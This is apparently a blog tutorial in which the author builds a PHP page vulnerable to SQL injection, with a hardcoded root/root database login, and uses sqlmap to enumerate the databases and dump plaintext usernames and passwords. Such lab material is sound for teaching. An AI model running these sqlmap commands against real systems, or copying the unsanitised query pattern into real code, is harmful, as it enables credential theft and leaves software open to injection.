Friday, 17 April 2015

SQL Injection Attack using sqlmap in Kali Linux


In this tutorial, we develop a sample web application and launch an SQL Injection attack against it, to grab the usernames and passwords from the database.

The Web application and database table is given below:

1) The login page 'cust_login.html'

cust_login.html
<html>
<body>
 <form method="get" action="cust_display.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'cust_display.php' displays the customer details


cust_display.php
<html>
<body>
<?php
$name = $_GET["name"];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select name,firstname,surname,address from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();
echo "firstname: " . $row["firstname"]. "<br>";
echo "surname: "   . $row["surname"].   "<br>";
echo "address: "   . $row["address"].     "<br>";

$conn->close();
?>
</body>
</html>


3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Launching SQL Injection attack against the web application

4.1) Fetch list of available databases
 root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir --dbs

available databases [6]:
[*] hacking
[*] information_schema
[*] mybank
[*] mysql
[*] performance_schema
[*] test

4.2) Fetch list of tables in database 'hacking'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking --tables

Database: hacking
[1 table]
+----------+
| customer |
+----------+


4.3) Fetch list of columns in table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer --columns

Database: hacking
Table: customer
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | varchar(200) |
| firstname | varchar(50)  |
| name      | varchar(50)  |
| passwd    | varchar(50)  |
| surname   | varchar(50)  |
+-----------+--------------+

4.4) Fetch list of 'username,password' from table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer -C name,passwd --dump

Database: hacking
Table: customer
[4 entries]
+---------+--------+
| name    | passwd |
+---------+--------+
| pk      | aunty  |
| priya   | blue   |
| shabbir | admin  |
| taher   | hello  |
+---------+--------+

No comments:

Post a Comment